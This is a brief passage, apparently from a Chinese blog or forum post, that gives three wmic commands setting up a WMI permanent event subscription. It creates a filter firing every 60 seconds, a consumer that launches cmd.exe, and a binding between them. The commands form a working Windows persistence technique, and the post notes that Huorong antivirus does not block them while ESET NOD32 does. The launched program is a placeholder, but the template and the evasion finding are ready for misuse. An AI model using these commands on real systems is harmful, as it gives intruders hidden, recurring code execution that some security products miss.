wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="test", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="test", ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate="C:\Windows\System32\cmd.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"test\"", Consumer="CommandLineEventConsumer.Name=\"test\""运行后效果如下:
最新版本的火绒不拦截这个命令,eset nod32阻止创建。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
